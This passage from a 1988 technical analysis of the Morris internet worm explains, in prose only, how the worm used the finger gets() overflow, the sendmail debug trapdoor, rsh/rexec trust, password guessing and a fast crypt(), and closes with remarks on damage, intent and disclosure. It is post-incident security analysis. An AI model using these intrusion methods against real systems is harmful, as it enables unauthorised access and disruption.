host; if it fails, the worm falls back upon _ f_ i_ n_ g_ e_ r, then _ s_ e_ n_ d_ -
_ m_ a_ i_ l.  Many sites, including Utah, already were protected from
this trivial attack by not providing remote shells for pseudo-
users like _ d_ a_ e_ m_ o_ n or _ n_ o_ b_ o_ d_ y.

     A more sophisticated use of these services is found in the
password cracking routines.  After a password is successfully
guessed, the worm immediately tries to penetrate remote hosts
associated with the broken account.  It reads the user's ._ f_ o_ r_ w_ a_ r_ d
file (which contains an address to which mail is forwarded) and
._ r_ h_ o_ s_ t_ s file (which contains a list of hosts and optionally user
names on those hosts which are granted permission to access the
local machine with _ r_ s_ h bypassing the usual password authentica-
tion), trying these hostnames until it succeeds.  Each target
host is attacked in two ways.  The worm first contacts the remote
host's _ r_ e_ x_ e_ c server and sends it the account name found in the
._ f_ o_ r_ w_ a_ r_ d or ._ r_ h_ o_ s_ t_ s files followed by the guessed password.  If
this fails, the worm connects to the local _ r_ e_ x_ e_ c server with the
local account name and uses that to contact the target's _ r_ s_ h
server.  The remote _ r_ s_ h server will permit the connection pro-
vided the name of the local host appears in either the
/_ e_ t_ c/_ h_ o_ s_ t_ s._ e_ q_ u_ i_ v file or the user's private ._ r_ h_ o_ s_ t_ s file.

     Strengthening these network services is far more problematic
than fixing _ f_ i_ n_ g_ e_ r and _ s_ e_ n_ d_ m_ a_ i_ l, unfortunately.  Users don't like
the inconvenience of typing their password when logging in on a
trusted local host, and they don't want to remember different
passwords for each of the many hosts they may have to deal with.
Some of the solutions may be worse than the disease--for example,
a user who is forced to deal with many passwords is more likely
to write them down somewhere.

_ 4._ 5._ 2.  _ F_ i_ n_ g_ e_ r

    _ g_ e_ t_ s was removed from our [C library] a couple days  ago.
    [Bill  Cheswick  at AT&T Bell Labs Research, private com-


Tour of the Worm                                               15


    munication, 11/9/88]


     Probably the neatest hack in the worm is its co-opting of
the TCP _ f_ i_ n_ g_ e_ r service to gain entry to a system.  _ F_ i_ n_ g_ e_ r reports
information about a user on a host, usually including things like
the user's full name, where their office is, the number of their
phone extension and so on.  The Berkeley[3] version of the _ f_ i_ n_ g_ e_ r
server is a really trivial program: it reads a request from the
originating host, then runs the local _ f_ i_ n_ g_ e_ r program with the
request as an argument and ships the output back.  Unfortunately
the _ f_ i_ n_ g_ e_ r server reads the remote request with _ g_ e_ t_ s(), a stan-
dard C library routine that dates from the dawn of time and which
does not check for overflow of the server's 512 byte request
buffer on the stack.  The worm supplies the finger server with a
request that is 536 bytes long; the bulk of the request is some
VAX machine code that asks the system to execute the command
interpreter _ s_ h, and the extra 24 bytes represent just enough data
to write over the server's stack frame for the main routine.
When the main routine of the server exits, the calling function's
program counter is supposed to be restored from the stack, but
the worm wrote over this program counter with one that points to
the VAX code in the request buffer.  The program jumps to the
worm's code and runs the command interpreter, which the worm uses
to enter its bootstrap.

     Not surprisingly, shortly after the worm was reported to use
this feature of _ g_ e_ t_ s(), a number of people replaced all instances
of _ g_ e_ t_ s() in system code with sensible code that checks the
length of the buffer.  Some even went so far as to remove _ g_ e_ t_ s()
from the library, although the function is apparently mandated by
the forthcoming ANSI C standard[4].  So far no one has claimed to
have exercised the finger server bug before the worm incident,
but in May 1988, students at UC Santa Cruz apparently penetrated
security using a different finger server with a similar bug.  The
system administrator at UCSC noticed that the Berkeley finger
server had a similar bug and sent mail to Berkeley, but the seri-
ousness of the problem was not appreciated at the time (Jim
Haynes, private communication).

     One final note: the worm is meticulous in some areas but not
in others.  From what we can tell, there was no Sun-3 version of
the _ f_ i_ n_ g_ e_ r intrusion even though the Sun-3 server was just as
vulnerable as the VAX one.  Perhaps the author had VAX sources
____________________
 9   [3] Actually, like much of the code in the Berkeley  distribu-
tion,  the  _ f_ i_ n_ g_ e_ r server was contributed from elsewhere; in this
case, it appears that MIT was the source.
   [4] See for example Appendix B, section 1.4 of the second edi-
tion of _ T_ h_ e _ C _ P_ r_ o_ g_ r_ a_ m_ m_ i_ n_ g _ L_ a_ n_ g_ u_ a_ g_ e by Kernighan and Ritchie.


 9


Tour of the Worm                                               16


available but not Sun sources?

_ 4._ 5._ 3.  _ S_ e_ n_ d_ m_ a_ i_ l

    [T]he trap door resulted  from  two  distinct  `features'
    that,  although  innocent by themselves, were deadly when
    combined (kind of like binary nerve gas).  [Eric  Allman,
    personal communication, 11/22/88]


     The _ s_ e_ n_ d_ m_ a_ i_ l attack is perhaps the least preferred in the
worm's arsenal, but in spite of that one site at Utah was sub-
jected to nearly 150 _ s_ e_ n_ d_ m_ a_ i_ l attacks on Black Thursday.  _ S_ e_ n_ d_ -
_ m_ a_ i_ l is the program that provides the SMTP mail service on TCP
networks for Berkeley UNIX systems.  It uses a simple character-
oriented protocol to accept mail from remote sites.  One feature
of _ s_ e_ n_ d_ m_ a_ i_ l is that it permits mail to be delivered to processes
instead of mailbox files; this can be used with (say) the _ v_ a_ c_ a_ -
_ t_ i_ o_ n program to notify senders that you are out of town and are
temporarily unable to respond to their mail.  Normally this
feature is only available to recipients.  Unfortunately a little
loophole was accidentally created when a couple of earlier secu-
rity bugs were being fixed--if _ s_ e_ n_ d_ m_ a_ i_ l is compiled with the
_ D_ E_ B_ U_ G flag, and the sender at runtime asks that _ s_ e_ n_ d_ m_ a_ i_ l enter
debug mode by sending the _ d_ e_ b_ u_ g command, it permits senders to
pass in a command sequence instead of a user name for a reci-
pient.  Alas, most versions of _ s_ e_ n_ d_ m_ a_ i_ l are compiled with _ D_ E_ B_ U_ G,
including the one that Sun sends out in its binary distribution.
The worm mimics a remote SMTP connection, feeding in /_ d_ e_ v/_ n_ u_ l_ l as
the name of the sender and a carefully crafted string as the
recipient.  The string sets up a command that deletes the header
of the message and passes the body to a command interpreter.  The
body contains a copy of the worm bootstrap source plus commands
to compile and run it.  After the worm finishes the protocol and
closes the connection to _ s_ e_ n_ d_ m_ a_ i_ l, the bootstrap will be built on
the remote host and the local worm waits for its connection so
that it can complete the process of building a new worm.

     Of course this is not the first time that an inadvertent
loophole or ``trap door'' like this has been found in sendmail,
and it may not be the last.  In his Turing Award lecture, Ken
Thompson said: ``You can't trust code that you did not totally
create yourself.  (Especially code from companies that employ
people like me.)'' In fact, as Eric Allman says, ``[Y]ou can't
even trust code that you did totally create yourself.'' The basic
problem of trusting system programs is not one that is easy to
solve.

_ 4._ 6.  _ I_ n_ f_ e_ c_ t_ i_ o_ n

     The worm uses two favorite routines when it decides that it
wants to infect a host.  One routine that we named _ i_ n_ f_ e_ c_ t() is
used from host scanning routines like _ h_ g().  _ i_ n_ f_ e_ c_ t() first


Tour of the Worm                                               17


checks that it isn't infecting the local machine, an already
infected machine or a machine previously attacked but not suc-
cessfully infected; the ``infected'' and ``immune'' states are
marked by flags on a host structure when attacks succeed or fail,
respectively.  The worm then makes sure that it can get an
address for the target host, marking the host immune if it can't.
Then comes a series of attacks: first by _ r_ s_ h from the account
that the worm is running under, then through _ f_ i_ n_ g_ e_ r, then through
_ s_ e_ n_ d_ m_ a_ i_ l.  If _ i_ n_ f_ e_ c_ t() fails, it marks the host as immune.

     The other infection routine is named _ h_ u_ 1() and it is run
from the password cracking code after a password has been
guessed.  _ h_ u_ 1(), like _ i_ n_ f_ e_ c_ t(), makes sure that it's not re-
infecting a host, then it checks for an address.  If a potential
remote user name is available from a ._ f_ o_ r_ w_ a_ r_ d or ._ r_ h_ o_ s_ t_ s file,
the worm checks it to make sure it is reasonable--it must contain
no punctuation or control characters.  If a remote user name is
unavailable the worm uses the local user name.  Once the worm has
a user name and a password, it contacts the _ r_ e_ x_ e_ c server on the
target host and tries to authenticate itself.  If it can, it
proceeds to the bootstrap phase; otherwise, it tries a slightly
different approach--it connects to the local _ r_ e_ x_ e_ c server with
the local user name and password, then uses this command inter-
preter to fire off a command interpreter on the target machine
with _ r_ s_ h.  This will succeed if the remote host says it trusts
the local host in its /_ e_ t_ c/_ h_ o_ s_ t_ s._ e_ q_ u_ i_ v file, or the remote
account says it trusts the local account in its ._ r_ h_ o_ s_ t_ s file.
_ h_ u_ 1() ignores _ i_ n_ f_ e_ c_ t()'s ``immune'' flag and does not set this
flag itself, since _ h_ u_ 1() may find success on a per-account basis
that _ i_ n_ f_ e_ c_ t() can't achieve on a per-host basis.

     Both _ i_ n_ f_ e_ c_ t() and _ h_ u_ 1() use a routine we call _ s_ e_ n_ d_ w_ o_ r_ m() to
do their dirty work[5].  _ s_ e_ n_ d_ w_ o_ r_ m() looks for the _ l_ 1._ c bootstrap
source file in its objects list, then it uses the _ m_ a_ k_ e_ m_ a_ g_ i_ c()
routine to get a communication stream endpoint (a _ s_ o_ c_ k_ e_ t), a ran-
dom network port number to rendezvous at, and a magic number for
authentication.  (There is an interesting side effect to
_ m_ a_ k_ e_ m_ a_ g_ i_ c()--it looks for a usable address for the target host by
trying to connect to its TCP _ t_ e_ l_ n_ e_ t port; this produces a charac-
teristic log message from the _ t_ e_ l_ n_ e_ t server.) If _ m_ a_ k_ e_ m_ a_ g_ i_ c() was
successful, the worm begins to send commands to the remote com-
mand interpreter that was started up by the immediately preceding
attack.  It changes its directory to an unprotected place
(/_ u_ s_ r/_ t_ m_ p), then it sends across the bootstrap source, using the
UNIX stream editor _ s_ e_ d to parse the input stream.  The bootstrap
____________________
 9   [5] One minor  exception:  the  _ s_ e_ n_ d_ m_ a_ i_ l  attack  doesn't  use
_ s_ e_ n_ d_ w_ o_ r_ m() since it needs to handle the SMTP protocol in addition
to the command interpreter interface, but the  principle  is  the
same.


 9


Tour of the Worm                                               18


source is compiled and run on the remote system, and the worm
runs a routine named _ w_ a_ i_ t_ h_ i_ t() to wait for the remote bootstrap
to call back on the selected port.

     The bootstrap is quite simple.  It is supplied the address
of the originating host, a TCP port number and a magic number as
arguments.  When it starts, it unlinks itself so that it can't be
detected in the filesystem, then it calls _ f_ o_ r_ k() to create a new
process with the same image.  The old process exits, permitting
the originating worm to continue with its business.  The
bootstrap reads its arguments then zeroes them out to hide them
from the system status program; then it is ready to connect over
the network to the parent worm.  When the connection is made, the
bootstrap sends over the magic number, which the parent will
check against its own copy.  If the parent accepts the number
(which is carefully rendered to be independent of host byte
order), it will send over a series of filenames and files which
the bootstrap writes to disk.  If trouble occurs, the bootstrap
removes all these files and exits.  Eventually the transaction
completes, and the bootstrap calls up a command interpreter to
finish the job.

     In the meantime, the parent in _ w_ a_ i_ t_ h_ i_ t() spends up to two
minutes waiting for the bootstrap to call back; if the bootstrap
fails to call back, or the authentication fails, the worm decides
to give up and reports a failure.  When a connection is success-
ful, the worm ships all of its files across followed by an end-
of-file indicator.  It pauses four seconds to let a command
interpreter start on the remote side, then it issues commands to
create a new worm.  For each relocatable object file in the list
of files, the worm tries to build an executable object; typically
each file contains code for a particular make of computer, and
the builds will fail until the worm tries the proper computer
type.  If the parent worm finally gets an executable child worm
built, it sets it loose with the -_ p option to kill the command
interpreter, then shuts down the connection.  The target host is
marked ``infected''.  If none of the objects produces a usable
child worm, the parent removes the detritus and _ w_ a_ i_ t_ h_ i_ t() returns
an error indication.

     When a system is being swamped by worms, the /_ u_ s_ r/_ t_ m_ p direc-
tory can fill with leftover files as a consequence of a bug in
_ w_ a_ i_ t_ h_ i_ t().  If a worm compile takes more than 30 seconds, resyn-
chronization code will report an error but _ w_ a_ i_ t_ h_ i_ t() will fail to
remove the files it has created.  On one of our machines, 13 MB
of material representing 86 sets of files accumulated over 5.5
hours.

_ 4._ 7.  _ P_ a_ s_ s_ w_ o_ r_ d _ c_ r_ a_ c_ k_ i_ n_ g

     A password cracking algorithm seems like a slow and bulky
item to put in a worm, but the worm makes this work by being per-
sistent and efficient.  The worm is aided by some unfortunate


Tour of the Worm                                               19


statistics about typical password choices.  Here we discuss how
the worm goes about choosing passwords to test and how the UNIX
password encryption routine was modified.

_ 4._ 7._ 1.  _ G_ u_ e_ s_ s_ i_ n_ g _ p_ a_ s_ s_ w_ o_ r_ d_ s

    For example, if the login name is ``abc'', then  ``abc'',
    ``cba'',  and  ``abcabc''  are  excellent  candidates for
    passwords.  [Grampp and Morris, ``UNIX  Operating  System
    Security'']


     The worm's password guessing is driven by a little 4-state
machine.  The first state gathers password data, while the
remaining states represent increasingly less likely sources of
potential passwords.  The central cracking routine is called
_ c_ r_ a_ c_ k_ s_ o_ m_ e(), and it contains a switch on each of the four states.

     The routine that implements the first state we named
_ c_ r_ a_ c_ k__ 0().  This routine's job is to collect information about
hosts and accounts.  It is only run once; the information it
gathers persists for the lifetime of the worm.  Its implementa-
tion is straightforward: it reads the files /_ e_ t_ c/_ h_ o_ s_ t_ s._ e_ q_ u_ i_ v and
/._ r_ h_ o_ s_ t_ s for hosts to attack, then reads the password file look-
ing for accounts.  For each account, the worm saves the name, the
encrypted password, the home directory and the user information
fields.  As a quick preliminary check, it looks for a ._ f_ o_ r_ w_ a_ r_ d
file in each user's home directory and saves any host name it
finds in that file, marking it like the previous ones.

     We unimaginatively called the function for the next state
_ c_ r_ a_ c_ k__ 1().  _ c_ r_ a_ c_ k__ 1() looks for trivially broken passwords.
These are passwords which can be guessed merely on the basis of
information already contained in the password file.  Grampp and
Morris report a survey of over 100 password files where between 8
and 30 percent of all passwords were guessed using just the
literal account name and a couple of variations.  The worm tries
a little harder than this: it checks the null password, the
account name, the account name concatenated with itself, the
first name (extracted from the user information field, with the
first letter mapped to lower case), the last name, and the
account name reversed.  It runs through up to 50 accounts per
call to _ c_ r_ a_ c_ k_ s_ o_ m_ e(), saving its place in the list of accounts and
advancing to the next state when it runs out of accounts to try.

     The next state is handled by _ c_ r_ a_ c_ k__ 2().  In this state the
worm compares a list of favorite passwords, one password per
call, with all of the encrypted passwords in the password file.
The list contains 432 words, most of which are real English words
or proper names; it seems likely that this list was generated by
stealing password files and cracking them at leisure on the worm
author's home machine.  A global variable _ n_ e_ x_ t_ w is used to count
the number of passwords tried, and it is this count (plus a loss


Tour of the Worm                                               20


in the population control game) that controls whether the worm
exits at the end of the main loop--_ n_ e_ x_ t_ w must be greater than 10
before the worm can exit.  Since the worm normally spends 2.5
minutes checking for clients over the course of the main loop and
calls _ c_ r_ a_ c_ k_ s_ o_ m_ e() twice in that period, it appears that the worm
must make a minimum of 7 passes through the main loop, taking
more than 15 minutes[6].  It will take at least 9 hours for the
worm to scan its built-in password list and proceed to the next
state.

     The last state is handled by _ c_ r_ a_ c_ k__ 3().  It opens the UNIX
online dictionary /_ u_ s_ r/_ d_ i_ c_ t/_ w_ o_ r_ d_ s and goes through it one word at
a time.  If a word is capitalized, the worm tries a lower-case
version as well.  This search can essentially go on forever: it
would take something like four weeks for the worm to finish a
typical dictionary like ours.

     When the worm selects a potential password, it passes it to
a routine we called _ t_ r_ y__ p_ a_ s_ s_ w_ o_ r_ d().  This function calls the
worm's special version of the UNIX password encryption function
_ c_ r_ y_ p_ t() and compares the result with the target account's actual
encrypted password.  If they are equal, or if the password and
guess are the null string (no password), the worm saves the
cleartext password and proceeds to attack hosts that are con-
nected to this account.  A routine we called
_ t_ r_ y__ f_ o_ r_ w_ a_ r_ d__ a_ n_ d__ r_ h_ o_ s_ t_ s() reads the user's ._ f_ o_ r_ w_ a_ r_ d and ._ r_ h_ o_ s_ t_ s
files, calling the previously described _ h_ u_ 1() function for each
remote account it finds.


____________________
 9   [6] For those mindful of details: The  first  call  to  _ c_ r_ a_ c_ k-
_ s_ o_ m_ e()  is consumed reading system files.  The worm must spend at
least one call to  _ c_ r_ a_ c_ k_ s_ o_ m_ e()  in  the  second  state  attacking
trivial  passwords.   This accounts for at least one pass through
the main loop.  In the third state, _ c_ r_ a_ c_ k_ s_ o_ m_ e() tests  one  pass-
word  from its list of favorites on each call; the worm will exit
if it lost a roll of the dice and more than ten words  have  been
checked,  so  this  accounts for at least six loops, two words on
each loop for five loops to reach 10 words, then another loop  to
pass  that  number.   Altogether  this  amounts to a minimum of 7
loops.  If all 7 loops took the maximum amount  of  time  waiting
for  clients,  this  would require a minimum of 17.5 minutes, but
the 2-minute check can exit early if a client  connects  and  the
server  loses  the  challenge, hence 15.5 minutes of waiting time
plus runtime overhead is the minimum lifetime.  In this period  a
worm will attack at least 8 hosts through the host infection rou-
tines, and will try about 18 passwords for each account,  attack-
ing more hosts if accounts are cracked.


 9


Tour of the Worm                                               21


_ 4._ 7._ 2.  _ F_ a_ s_ t_ e_ r _ p_ a_ s_ s_ w_ o_ r_ d _ e_ n_ c_ r_ y_ p_ t_ i_ o_ n

    The use of encrypted passwords appears reasonably  secure
    in  the  absence  of  serious attention of experts in the
    field.  [Morris and Thompson, ``Password Security: A Case
    History'']


     Unfortunately some experts in the field have been giving
serious attention to fast implementations of the UNIX password
encryption algorithm.  UNIX password authentication works without
putting any readable version of the password onto the system, and
indeed works without protecting the encrypted password against
reading by users on the system.  When a user types a password in
the clear, the system encrypts it using the standard _ c_ r_ y_ p_ t()
library routine, then compares it against a saved copy of the
encrypted password.  The encryption algorithm is meant to be
basically impossible to invert, preventing the retrieval of pass-
words by examining only the encrypted text, and it is meant to be
expensive to run, so that testing guesses will take a long time.
The UNIX password encryption algorithm is based on the Federal
Data Encryption Standard (DES).  Currently no one knows how to
invert this algorithm in a reasonable amount of time, and while
fast DES encoding chips are available, the UNIX version of the
algorithm is slightly perturbed so that it is impossible to use a
standard DES chip to implement it.

     Two problems have been mitigating against the UNIX implemen-
tation of DES.  Computers are continually increasing in speed--
current machines are typically several times faster than the
machines that were available when the current password scheme was
invented.  At the same time, ways have been discovered to make
software DES run faster.  UNIX passwords are now far more suscep-
tible to persistent guessing, particularly if the encrypted pass-
words are already known.  The worm's version of the UNIX _ c_ r_ y_ p_ t()
routine ran more than 9 times faster than the standard version
when we tested it on our VAX 8600.  While the standard _ c_ r_ y_ p_ t()
takes 54 seconds to encrypt 271 passwords on our 8600 (the number
of passwords actually contained in our password file), the worm's
_ c_ r_ y_ p_ t() takes less than 6 seconds.

     The worm's _ c_ r_ y_ p_ t() algorithm appears to be a compromise
between time and space: the time needed to encrypt one password
guess versus the substantial extra table space needed to squeeze
performance out of the algorithm.  Curiously, one performance
improvement actually saves a little space.  The traditional UNIX
algorithm stores each bit of the password in a byte, while the
worm's algorithm packs the bits into two 32-bit words.  This per-
mits the worm's algorithm to use bit-field and shift operations
on the password data, which is immensely faster.  Other speedups
include unrolling loops, combining tables, precomputing shifts
and masks, and eliminating redundant initial and final permuta-
tions when performing the 25 applications of modified DES that


Tour of the Worm                                               22


the password encryption algorithm uses.  The biggest performance
improvement comes as a result of combining permutations: the worm
uses expanded arrays which are indexed by groups of bits rather
than the single bits used by the standard algorithm.  Matt
Bishop's fast version of _ c_ r_ y_ p_ t() does all of these things and
also precomputes even more functions, yielding twice the perfor-
mance of the worm's algorithm but requiring nearly 200 KB of ini-
tialized data as opposed to the 6 KB used by the worm and the
less than 2 KB used by the normal _ c_ r_ y_ p_ t().

     How can system administrators defend against fast implemen-
tations of _ c_ r_ y_ p_ t()?  One suggestion that has been introduced for
foiling the bad guys is the idea of shadow password files.  In
this scheme, the encrypted passwords are hidden rather than pub-
lic, forcing a cracker to either break a privileged account or
use the host's CPU and (slow) encryption algorithm to attack,
with the added danger that password test requests could be logged
and password cracking discovered.  The disadvantage of shadow
password files is that if the bad guys somehow get around the
protections for the file that contains the actual passwords, all
of the passwords must be considered cracked and will need to be
replaced.  Another suggestion has been to replace the UNIX DES
implementation with the fastest available implementation, but run
it 1000 times or more instead of the 25 times used in the UNIX
_ c_ r_ y_ p_ t() code.  Unless the repeat count is somehow pegged to the
fastest available CPU speed, this approach merely postpones the
day of reckoning until the cracker finds a faster machine.  It's
interesting to note that Morris and Thompson measured the time to
compute the old M-209 (non-DES) password encryption algorithm
used in early versions of UNIX on the PDP-11/70 and found that a
good implementation took only 1.25 milliseconds per encryption,
which they deemed insufficient; currently the VAX 8600 using Matt
Bishop's DES-based algorithm needs 11.5 milliseconds per encryp-
tion, and machines 10 times faster than the VAX 8600 at a cheaper
price will be available soon (if they aren't already!).

_ 5.  _ O_ p_ i_ n_ i_ o_ n_ s

    The act of breaking into a computer system  has  to  have
    the  same  social  stigma  as  breaking into a neighbor's
    house.  It should not matter that the neighbor's door  is
    unlocked.  [Ken Thompson, 1983 Turing Award Lecture]
 9    [Creators of viruses are] stealing a car for the  purpose
    of  joyriding.   [R  H  Morris, in 1983 Capitol Hill tes-
    timony, cited in the New York Times 11/11/88]


     I don't propose to offer definitive statements on the moral-
ity of the worm's author, the ethics of publishing security
information or the security needs of the UNIX computing commun-
ity, since people better (and less) qualified than I are still
copiously flaming on these topics in the various network


 9


Tour of the Worm                                               23


newsgroups and mailing lists.  For the sake of the mythical ordi-
nary system administrator who might have been confused by all the
information and misinformation, I will try to answer a few of the
most relevant questions in a narrow but useful way.

     _ D_ i_ d _ t_ h_ e _ w_ o_ r_ m _ c_ a_ u_ s_ e _ d_ a_ m_ a_ g_ e?  The worm did not destroy files,
intercept private mail, reveal passwords, corrupt databases or
plant trojan horses.  It did compete for CPU time with, and even-
tually overwhelm, ordinary user processes.  It used up limited
system resources such as the open file table and the process text
table, causing user processes to fail for lack of same.  It
caused some machines to crash by operating them close to the lim-
its of their capacity, exercising bugs that do not appear under
normal loads.  It forced administrators to perform one or more
reboots to clear worms from the system, terminating user sessions
and long-running jobs.  It forced administrators to shut down
network gateways, including gateways between important nation-
wide research networks, in an effort to isolate the worm; this
led to delays of up to several days in the exchange of electronic
mail, causing some projects to miss deadlines and others to lose
valuable research time.  It made systems staff across the country
drop their ongoing hacks and work 24-hour days trying to corner
and kill worms.  It caused members of management in at least one
institution to become so frightened that they scrubbed all the
disks at their facility that were online at the time of the
infection, and limited reloading of files to data that was verif-
iably unmodified by a foreign agent.  It caused bandwidth through
gateways that were still running after the infection started to
become substantially degraded--the gateways were using much of
their capacity just shipping the worm from one network to
another.  It penetrated user accounts and caused it to appear
that a given user was disturbing a system when in fact they were
not responsible.  It's true that the worm could have been far
more harmful that it actually turned out to be: in the last few
weeks, several security bugs have come to light which the worm
could have used to thoroughly destroy a system.  Perhaps we
should be grateful that we escaped incredibly awful consequences,
and perhaps we should also be grateful that we have learned so
much about the weaknesses in our systems' defenses, but I think
we should share our gratefulness with someone other than the
worm's author.

     _ W_ a_ s _ t_ h_ e _ w_ o_ r_ m _ m_ a_ l_ i_ c_ i_ o_ u_ s?  Some people have suggested that the
worm was an innocent experiment that got out of hand, and that it
was never intended to spread so fast or so widely.  We can find
evidence in the worm to support and to contradict this
hypothesis.  There are a number of bugs in the worm that appear
to be the result of hasty or careless programming.  For example,
in the worm's _ i_ f__ i_ n_ i_ t() routine, there is a call to the block
zero function _ b_ z_ e_ r_ o() that incorrectly uses the block itself
rather than the block's address as an argument.  It's also possi-
ble that a bug was responsible for the ineffectiveness of the
population control measures used by the worm.  This could be seen


Tour of the Worm                                               24


as evidence that a development version of the worm ``got loose''
accidentally, and perhaps the author originally intended to test
the final version under controlled conditions, in an environment
from which it would not escape.  On the other hand, there is con-
siderable evidence that the worm was designed to reproduce
quickly and spread itself over great distances.  It can be argued
that the population control hacks in the worm are anemic by
design: they are a compromise between spreading the worm as
quickly as possible and raising the load enough to be detected
and defeated.  A worm will exist for a substantial amount of time
and will perform a substantial amount of work even if it loses
the roll of the (imaginary) dice; moreover, 1 in 7 worms become
immortal and can't be killed by dice rolls.  There is ample evi-
dence that the worm was designed to hamper efforts to stop it
even after it was identified and captured.  It certainly suc-
ceeded in this, since it took almost a day before the last mode
of infection (the _ f_ i_ n_ g_ e_ r server) was identified, analyzed and
reported widely; the worm was very successful in propagating
itself during this time even on systems which had fixed the _ s_ e_ n_ d_ -
_ m_ a_ i_ l debug problem and had turned off _ r_ e_ x_ e_ c.  Finally, there is
evidence that the worm's author deliberately introduced the worm
to a foreign site that was left open and welcome to casual out-
side users, rather ungraciously abusing this hospitality.  He
apparently further abused this trust by deleting a log file that
might have revealed information that could link his home site
with the infection.  I think the innocence lies in the research
community rather than with the worm's author.

     _ W_ i_ l_ l _ p_ u_ b_ l_ i_ c_ a_ t_ i_ o_ n _ o_ f _ w_ o_ r_ m _ d_ e_ t_ a_ i_ l_ s _ f_ u_ r_ t_ h_ e_ r _ h_ a_ r_ m _ s_ e_ c_ u_ r_ i_ t_ y?  In
a sense, the worm itself has solved that problem: it has pub-
lished itself by sending copies to hundreds or thousands of
machines around the world.  Of course a bad guy who wants to use
the worm's tricks would have to go through the same effort that
we went through in order to understand the program, but then it
only took us a week to completely decompile the program, so while
it takes fortitude to hack the worm, it clearly is not greatly
difficult for a decent programmer.  One of the worm's most effec-
tive tricks was advertised when it entered--the bulk of the _ s_ e_ n_ d_ -
_ m_ a_ i_ l hack is visible in the log file, and a few minutes' work
with the sources will reveal the rest of the trick.  The worm's
fast password algorithm could be useful to the bad guys, but at
least two other faster implementations have been available for a
year or more, so it isn't very secret, or even very original.
Finally, the details of the worm have been well enough sketched
out on various newsgroups and mailing lists that the principal
hacks are common knowledge.  I think it's more important that we
understand what happened, so that we can make it less likely to
happen again, than that we spend time in a futile effort to cover
up the issue from everyone but the bad guys.  Fixes for both
source and binary distributions are widely available, and anyone
who runs a system with these vulnerabilities needs to look into
these fixes immediately, if they haven't done so already.
 9

 9


Tour of the Worm                                               25


_ 6.  _ C_ o_ n_ c_ l_ u_ s_ i_ o_ n

    It has raised the public awareness to a considerable  de-
    gree.  [R H Morris, quoted in the New York Times 11/5/88]


     This quote is one of the understatements of the year.  The
worm story was on the front page of the New York Times and other
newspapers for days.  It was the subject of television and radio
features.  Even the _ B_ l_ o_ o_ m _ C_ o_ u_ n_ t_ y comic strip poked fun at it.

     Our community has never before been in the limelight in this
way, and judging by the response, it has scared us.  I won't
offer any fancy platitudes about how the experience is going to
change us, but I will say that I think these issues have been
ignored for much longer than was safe, and I feel that a better
understanding of the crisis just past will help us cope better
with the next one.  Let's hope we're as lucky next time as we
were this time.

_ A_ c_ k_ n_ o_ w_ l_ e_ d_ g_ m_ e_ n_ t_ s

     No one is to blame for the inaccuracies herein except me,
but there are plenty of people to thank for helping to decompile
the worm and for helping to document the epidemic.  Dave Pare and
Chris Torek were at the center of the action during the late
night session at Berkeley, and they had help and kibitzing from
Keith Bostic, Phil Lapsley, Peter Yee, Jay Lepreau and a cast of
thousands.  Glenn Adams and Dave Siegel provided good information
on the MIT AI Lab attack, while Steve Miller gave me details on
Maryland, Jeff Forys on Utah, and Phil Lapsley, Peter Yee and
Keith Bostic on Berkeley.  Bill Cheswick sent me a couple of fun
anecdotes from AT&T Bell Labs.  Jim Haynes gave me the run-down
on the security problems turned up by his busy little undergrads
at UC Santa Cruz.  Eric Allman, Keith Bostic, Bill Cheswick, Mike
Hibler, Jay Lepreau, Chris Torek and Mike Zeleznik provided many
useful review comments.  Thank you all, and everyone else I for-
got to mention.

     Matt Bishop's paper ``A Fast Version of the DES and a Pass-
word Encryption Algorithm'',  8c 91987 by Matt Bishop and the Univer-
sities Space Research Association, was helpful in (slightly)
parting the mysteries of DES for me.  Anyone wishing to under-
stand the worm's DES hacking had better look here first.  The
paper is available with Bishop's _ d_ e_ s_ z_ i_ p distribution of software
for fast DES encryption.  The latter was produced while Bishop
was with the Research Institute for Advanced Computer Science at
NASA Ames Research Center; Bishop is now at Dartmouth College
(_ b_ i_ s_ h_ o_ p@_ b_ e_ a_ r._ d_ a_ r_ t_ m_ o_ u_ t_ h._ e_ d_ u).  He sent me a very helpful note on
the worm's implementation of _ c_ r_ y_ p_ t() which I leaned on heavily
when discussing the algorithm above.

 9

 9


Tour of the Worm                                               26


     The following documents were also referenced above for
quotes or for other material:

_ D_ a_ t_ a _ E_ n_ c_ r_ y_ p_ t_ i_ o_ n _ S_ t_ a_ n_ d_ a_ r_ d, FIPS PUB 46, National Bureau of Stan-
dards, Washington D.C., January 15, 1977.

F. T. Grampp and R. H. Morris, ``UNIX Operating System Secu-
rity,'' in the _ A_ T&_ T _ B_ e_ l_ l _ L_ a_ b_ o_ r_ a_ t_ o_ r_ i_ e_ s _ T_ e_ c_ h_ n_ i_ c_ a_ l _ J_ o_ u_ r_ n_ a_ l, October
1984, Vol. 63, No. 8, Part 2, p. 1649.

Brian W. Kernighan and Dennis Ritchie, _ T_ h_ e _ C _ P_ r_ o_ g_ r_ a_ m_ m_ i_ n_ g
_ L_ a_ n_ g_ u_ a_ g_ e, Second Edition, Prentice Hall: Englewood Cliffs, NJ,
 8c 91988.

John Markoff, ``Author of computer `virus' is son of U.S. Elec-
tronic Security Expert,'' p. 1 of the _ N_ e_ w _ Y_ o_ r_ k _ T_ i_ m_ e_ s, November 5,
1988.

John Markoff, ``A family's passion for computers, gone sour,'' p.
1 of the _ N_ e_ w _ Y_ o_ r_ k _ T_ i_ m_ e_ s, November 11, 1988.

Robert Morris and Ken Thompson, ``Password Security: A Case His-
tory,'' dated April 3, 1978, in the _ U_ N_ I_ X _ P_ r_ o_ g_ r_ a_ m_ m_ e_ r'_ s _ M_ a_ n_ u_ a_ l, in
the _ S_ u_ p_ p_ l_ e_ m_ e_ n_ t_ a_ r_ y _ D_ o_ c_ u_ m_ e_ n_ t_ s or the _ S_ y_ s_ t_ e_ m _ M_ a_ n_ a_ g_ e_ r'_ s _ M_ a_ n_ u_ a_ l,
depending on where and when you got your manuals.

Robert T. Morris, ``A Weakness in the 4.2BSD Unix TCP/IP
Software,'' AT&T Bell Laboratories Computing Science Technical
Report #117, February 25, 1985.  This paper actually describes a
way of spoofing TCP/IP so that an untrusted host can make use of
the _ r_ s_ h server on any 4.2 BSD UNIX system, rather than an attack
based on breaking into accounts on trusted hosts, which is what
the worm uses.

Brian Reid, ``Massive UNIX breakins at Stanford,'' RISKS-FORUM
Digest, Vol. 3, Issue 56, September 16, 1986.

Dennis Ritchie, ``On the Security of UNIX,'' dated June 10, 1977,
in the same manual you found the Morris and Thompson paper in.

